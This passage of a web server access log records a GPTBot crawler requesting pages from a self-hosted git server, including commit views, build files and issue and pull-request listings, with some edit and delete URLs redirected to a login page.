compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" -[17/Feb/2026:16:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14079] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481687] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" -[17/Feb/2026:16:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481686] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" -[17/Feb/2026:16:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 24162] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" -[17/Feb/2026:16:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 11340] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" -[17/Feb/2026:16:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:16:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:16:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11523] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" -[17/Feb/2026:16:57:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:57:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json?display=source" [Client 74.7.227.38] [Length 11355] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 10393] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:16:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:16:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:16:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:16:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:16:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:16:58:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:58:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/global.json" -[17/Feb/2026:16:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:16:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:16:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:16:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10115] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:16:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10108] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:16:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:16:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:16:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10118] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:16:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10123] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:16:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10109] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:16:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:16:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10106] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:16:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10112] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10117] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10123] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:16:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:16:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:16:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:16:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:16:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:16:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9934] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:16:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" 